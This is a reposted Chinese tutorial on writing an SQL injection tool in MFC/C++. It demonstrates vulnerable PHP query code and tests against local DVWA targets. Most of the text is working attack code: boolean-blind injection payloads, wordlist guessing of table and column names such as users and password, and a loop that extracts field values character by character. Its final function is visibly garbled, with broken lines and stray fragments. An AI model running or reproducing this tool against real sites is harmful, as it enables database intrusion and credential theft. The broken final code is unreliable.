网络安全编程:开发SQL注入工具
Posted 计算机与网络安全
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了网络安全编程:开发SQL注入工具相关的知识,希望对你有一定的参考价值。
一次性付费进群,长期免费索取资料。
Select * from user where username='admin' and password='123456'
http://localhost/article.php?id=1
Select * from article where id = 1
Select * from article where id = '1'
Select * from article where title like '%微信公众号:计算机与网络安全%'
http://localhost/article.php?id=1
$id = $_GET['id'];
$sql = "select * from article where id = '" . $id . "'";
mysql_query($sql);
$id = $_GET['id'];
$sql = "select * from article where id = " . $id;
Mysql_query($sql);
http://localhost/article.php?id=1 and 1=1
http://localhost/article.php?id=1' and '1'='1
http://localhost/article.php?id=1 and 1=2
http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#
http://127.0.0.1/dvwa/vulnerabilities/sqli/?Submit=Submit&id=1
void CSQLInjectToolsDlg::OnBnClickedButton1()
{
// TODO: 在此添加控件通知处理程序代码
CString strUrl;
GetDlgItemText(IDC_EDIT1, strUrl);
GetDlgItemText(IDC_EDIT2, m_strSign);
DWORD dwServiceType; // 服务类型
CString strServer; // 服务器地址
CString strObject; // URL 指向的对象
INTERNET_PORT nPort; // 端口号
AfxParseURL(strUrl, dwServiceType, strServer, strObject, nPort);
CheckInject(strServer, strObject, nPort);
}
void CSQLInjectToolsDlg::CheckInject(CString strServer, CString strObject, INTERNET_
PORT nPort)
{
CString strUrl;
strUrl = "http://" + strServer + strObject;
switch ( m_nSel )
{
case 1:
{
m_ScanList.InsertItem(m_ScanList.GetItemCount(), "测试字符型");
if ( Check(strServer, strObject, pCharText[0], pCharText[1]) )
{
strUrl = strUrl + "[存在]";
}
else
{
strUrl = strUrl + "[不存在]";
}
break;
}
case 2:
{
m_ScanList.InsertItem(m_ScanList.GetItemCount(), "测试数值型");
if ( Check(strServer, strObject, pNumText[0], pNumText[1]) )
{
strUrl = strUrl + "[存在]";
}
else
{
strUrl = strUrl + "[不存在]";
}
break;
}
case 3:
{
m_ScanList.InsertItem(m_ScanList.GetItemCount(), "测试搜索型");
if ( Check(strServer, strObject, pSearchText[0], pSearchText[1]) )
{
strUrl = strUrl + "[存在]";
}
else
{
strUrl = strUrl + "[不存在]";
}
break;
}
default:
{
AfxMessageBox("请选择测试类型!!");
break;
}
}
m_ScanList.InsertItem(m_ScanList.GetItemCount(), strUrl);
// closesocket(m_sock);
}
BOOL CSQLInjectToolsDlg::Check(CString strServer, CString strObject, CString str11,
CString str12)
{
BOOL bRet = FALSE;
char szSendPacket[1024] = { 0 };
char szRecvPacket[0x2048] = { 0 };
CString strUrl;
m_sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
sockaddr_in ServerAddr = { 0 };
ServerAddr.sin_family = AF_INET;
ServerAddr.sin_port = htons(80);
ServerAddr.sin_addr.S_un.S_addr = inet_addr(strServer);
connect(m_sock, (const sockaddr *)&ServerAddr, sizeof(ServerAddr));
// 测试真
strUrl = strObject + str11;
HttpGet(szSendPacket, strUrl.GetBuffer(0), strServer.GetBuffer(0));
send(m_sock, szSendPacket, strlen(szSendPacket), 0);
recv(m_sock, szRecvPacket, 0x2048, 0);
CString strPacket_11 = szRecvPacket;
closesocket(m_sock);
m_sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
connect(m_sock, (const sockaddr *)&ServerAddr, sizeof(ServerAddr));
// 测试假
strUrl = strObject + str12;
ZeroMemory(szSendPacket, 1024);
ZeroMemory(szRecvPacket, 0x2048);
HttpGet(szSendPacket, strUrl.GetBuffer(0), strServer.GetBuffer(0));
send(m_sock, szSendPacket, strlen(szSendPacket), 0);
recv(m_sock, szRecvPacket, 0x2048, 0);
CString strPacket_12 = szRecvPacket;
closesocket(m_sock);
if ( strPacket_11.Find(m_strSign) != -1 && strPacket_12.Find(m_strSign) == -1 )
{
bRet = TRUE;
}
return bRet;
}
void CSQLInjectToolsDlg::HttpGet(char* strGetPacket, char* strUrl, char* strHost)
{
wsprintf(strGetPacket, "GET %s HTTP/1.1\r\n"
"Host: %s\r\n"
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,
*/*;q=0.8\r\n"
"Upgrade-Insecure-Requests: 1\r\n"
"User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/50.0.2661.102 Safari/537.36\r\n"
"Referer: http://localhost/dvwa-1.9/vulnerabilities/sqli/\r\n"
"Accept-Encoding: gzip, deflate, sdch\r\n"
"Accept-Language: zh-CN,zh;q=0.8\r\n"
"Cookie: security=low; pgv_pvi=8928542720; Hm_lvt_0a8b0d0d0f05cb8727db5cc8d
1f0dc08=1505118977; a5787_times=1; a3564_times=1; pageNo=1; pageSize=30;
Hm_lvt_82116c626a8d504a5c0675073362ef6f=1508373269,1508719861,1508806033,
1508821087; PHPSESSID=jn0pc2a4eubcd400m4bh6nv1n2\r\n"
"Connection: close\r\n\r\n", strUrl, strHost);
}
// 字符型
char *pCharText[] =
{
"%27+and+%271%27=%271",
"%27+and+%271%27=%272"
};
// 数值型
char *pNumText[] =
{
" and 1=1",
" and 1=2"
};
// 搜索型
char *pSearchText[] =
{
"%25%27+and+1=1+and+%27%25%27=%27%25",
"%25%27+and+1=2+and+%27%25%27=%27%25"
};
Select firstname, surname from 表 名 where id = '1' and exists(select * from users) and
'1'='1'
void CSQLInjectToolsDlg::OnBnClickedButton2()
{
// TODO: 在此添加控件通知处理程序代码
CString strUrl;
GetDlgItemText(IDC_EDIT1, strUrl);
GetDlgItemText(IDC_EDIT2, m_strSign);
DWORD dwServiceType; // 服务类型
CString strServer; // 服务器地址
CString strObject; // URL 指向的对象
INTERNET_PORT nPort; // 端口号
AfxParseURL(strUrl, dwServiceType, strServer, strObject, nPort);
int nTable = sizeof(tables) / MAXBYTE;
m_ScanList.InsertItem(m_ScanList.GetItemCount(), "开始猜表名");
for ( int i = 0; i < nTable; i++ )
{
CString strUrl_1;
// and (select count(*) from user) > 0
strUrl_1.Format("%s%%27+and+exists%%28select+*+from+%s%%29+and+%%271%%27=%%271",
strObject, tables[i]);
m_sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
sockaddr_in ServerAddr = { 0 };
ServerAddr.sin_family = AF_INET;
ServerAddr.sin_port = htons(80);
ServerAddr.sin_addr.S_un.S_addr = inet_addr(strServer);
connect(m_sock, (const sockaddr *)&ServerAddr, sizeof(ServerAddr));
char szSendPacket[1024] = { 0 };
char szRecvPacket[0x2048] = { 0 };
HttpGet(szSendPacket, strUrl_1.GetBuffer(0), strServer.GetBuffer(0));
send(m_sock, szSendPacket, strlen(szSendPacket), 0);
recv(m_sock, szRecvPacket, 0x2048, 0);
CString strPacket;
strPacket = szRecvPacket;
CString tab = tables[i];
if ( strPacket.Find(m_strSign) != -1 )
{
tab = tab + "[存在该表]";
}
m_ScanList.InsertItem(m_ScanList.GetItemCount(), tab);
closesocket(m_sock);
}
m_ScanList.InsertItem(m_ScanList.GetItemCount(), "结束猜表名");
}
strUrl_1.Format("%s%%27+and+exists%%28select+*+from+%s%%29+and+%%271%%27=%%271",
strObject, tables[i]);
// 猜表名
char tables[][MAXBYTE] = { "admin", "manage", "users", "user", "guestbook", "note"};
char columns[][MAXBYTE] = { "id", "user", "username", "pass", "pwd", "password"};
void CSQLInjectToolsDlg::OnBnClickedButton3()
{
// TODO: 在此添加控件通知处理程序代码
CString strTable;
CString strUrl;
GetDlgItemText(IDC_EDIT1, strUrl);
GetDlgItemText(IDC_EDIT2, m_strSign);
GetDlgItemText(IDC_EDIT3, strTable); // 获取猜解表名
DWORD dwServiceType; // 服务类型
CString strServer; // 服务器地址
CString strObject; // URL 指向的对象
INTERNET_PORT nPort; // 端口号
AfxParseURL(strUrl, dwServiceType, strServer, strObject, nPort);
int nColumns = sizeof(columns) / MAXBYTE;
m_ScanList.InsertItem(m_ScanList.GetItemCount(), "开始猜列名");
for ( int i = 0; i < nColumns; i++ )
{
CString strUrl_1;
// and (select count(id) from user) > 0
strUrl_1.Format("%s%%27+and+%%28select+count%%28%s%%29+from+%s%%29>0+and+
%%271%%27=%%271", strObject, columns[i], strTable);
m_sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
sockaddr_in ServerAddr = { 0 };
ServerAddr.sin_family = AF_INET;
ServerAddr.sin_port = htons(80);
ServerAddr.sin_addr.S_un.S_addr = inet_addr(strServer);
connect(m_sock, (const sockaddr *)&ServerAddr, sizeof(ServerAddr));
char szSendPacket[1024] = { 0 };
char szRecvPacket[0x2048] = { 0 };
HttpGet(szSendPacket, strUrl_1.GetBuffer(0), strServer.GetBuffer(0));
send(m_sock, szSendPacket, strlen(szSendPacket), 0);
recv(m_sock, szRecvPacket, 0x2048, 0);
CString strPacket;
strPacket = szRecvPacket;
CString col = columns[i];
if ( strPacket.Find(m_strSign) != -1 )
{
col = col + "[存在该列]";
}
m_ScanList.InsertItem(m_ScanList.GetItemCount(), col);
closesocket(m_sock);
}
m_ScanList.InsertItem(m_ScanList.GetItemCount(), "结束猜列名");
}
1' and (select count(password) from users)>0 and '1'='1
1' and (select length(user) from users limit 0,1)=5 and '1'='1
strUrl.format("1' and (select length(字段名) from 表名 limit %s,1)=%d and '1'='1",n, len);
// 字段值
1' and (select ascii(mid(user, 1, 1)) from users limit 0, 1) = 97 and '1'='1
1' and (select ascii(mid(user, 2, 1)) from users limit 0, 1) = 100 and '1'='1
1' and (select ascii(mid(user, 3, 1)) from users limit 0, 1) = 109 and '1'='1
1' and (select ascii(mid(user, 4, 1)) from users limit 0, 1) = 105 and '1'='1
1' and (select ascii(mid(user, 5, 1)) from users limit 0, 1) = 110 and '1'='1
void CSQLInjectToolsDlg::OnBnClickedButton4()
{
// TODO: 在此添加控件通知处理程序代码
CString strTable;
CString strField;
CString strUrl;
CString strNum;
GetDlgItemText(IDC_EDIT1, strUrl);
GetDlgItemText(IDC_EDIT2, m_strSign);
GetDlgItemText(IDC_EDIT3, strTable); // 获取猜解表名
GetDlgItemText(IDC_EDIT4, strField); // 列名
GetDlgItemText(IDC_EDIT5, strNum); // 猜解第几行
DWORD dwServiceType; // 服务类型
CString strServer; // 服务器地址
CString strObject; // URL 指向的对象
INTERNET_PORT nPort; // 端口号
AfxParseURL(strUrl, dwServiceType, strServer, strObject, nPort);
m_ScanList.InsertItem(m_ScanList.GetItemCount(), "开始猜列值长度");
// 求长度
int nLen = 1;
while ( nLen <= 64 )
{
CString strUrl_1;
// and (select length(username) from user limit 1) = 5
strUrl_1.Format("%s%%27+and+%%28select+length%%28%s%%29+from+%s+limit+%s%%2
C1%%29=%d+and+%%271%%27=%%271", strObject, strField, strTable, strNum, nLen);
m_sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
sockaddr_in ServerAddr = { 0 };
ServerAddr.sin_family = AF_INET;
ServerAddr.sin_port = htons(80);
ServerAddr.sin_addr.S_un.S_addr = inet_addr(strServer);
connect(m_sock, (const sockaddr *)&ServerAddr, sizeof(ServerAddr));
char szSendPacket[1024] = { 0 };
char szRecvPacket[0x2048] = { 0 };
HttpGet(szSendPacket, strUrl_1.GetBuffer(0), strServer.GetBuffer(0));
send(m_sock, szSendPacket, strlen(szSendPacket), 0);
recv(m_sock, szRecvPacket, 0x2048, 0);
CString strPacket;
strPacket = szRecvPacket;
if ( strPacket.Find(m_strSign) != -1 )
{
closesocket(m_sock);
break;
}
closesocket(m_sock);
nLen ++;
}
CString num;
num.Format("%d", nLen);
m_ScanList.InsertItem(m_ScanList.GetItemCount(), num);
m_ScanList.InsertItem(m_ScanList.GetItemCount(), "结束猜列值长度");
}
void CSQLInjectToolsDlg::OnBnClickedButton5()
{
// 在此添加控件通知处理程序代码
CString strTable;
CString strField;
CString strUrl;
CString strNum;
int nLen;
GetDlgItemText(IDC_EDIT1, strUrl);
GetDlgItemText(IDC_EDIT2, m_strSign);
GetDlgItemText(IDC_EDIT3, strTable); // 获取猜解表名
GetDlgItemText(IDC_EDIT4, strField); // 列名
GetDlgItemText(IDC_EDIT5, strNum); // 猜解第几行
GetDlgItemInt(IDC_EDIT6); =
DWORD dwServiceType; // 服务类型
CString strServer; // 服务器地址
CString strObject; // URL 指向的对象
INTERNET_PORT nPort; // 端口号
AfxParseURL(strUrl, dwServiceType, strServer, strObject, nPort);
m_ScanList.InsertItem(m_ScanList.GetItemCount(), "开始猜列值");
CString strValue;
1; =
CString username;
// 长度用于猜解每一位
nLen ) =
{
// 这里猜解只猜解小写的字母
// 这里在实际的时候需要改成各种可能的字符
97; c < 122; c ++ ) =
{
CString strUrl_1;
97 =
strUrl_1.Format("%s%%27+and+%%28select+ascii%%28mid%%28%s,%d,1%%29%%29+
%d+and+%%271%%27=%%271", =
strObject, strField, i, strTable, strNum, c);
socket(PF_INET, SOCK_STREAM, IPPROTO_TCP); =
{ 0 }; =
AF_INET; =
htons(80); =
inet_addr(strServer); =
connect(m_sock, (const sockaddr *)&ServerAddr, sizeof(ServerAddr));
{ 0 }; =
{ 0 }; =
HttpGet(szSendPacket, strUrl_1.GetBuffer(0), strServer.GetBuffer(0));
send(m_sock, szSendPacket, strlen(szSendPacket), 0);
recv(m_sock, szRecvPacket, 0x2048, 0);
CString strPacket;
szRecvPacket; =
-1 ) =
{
// 拼接猜解的每一位用户名
username.Format("%s%c", username, c);
closesocket(m_sock);
break;
}
closesocket(m_sock);
}
i ++;
}
username + "[猜解结果]"; =
m_ScanList.InsertItem(m_ScanList.GetItemCount(), username);
m_ScanList.InsertItem(m_ScanList.GetItemCount(), "结束猜列值");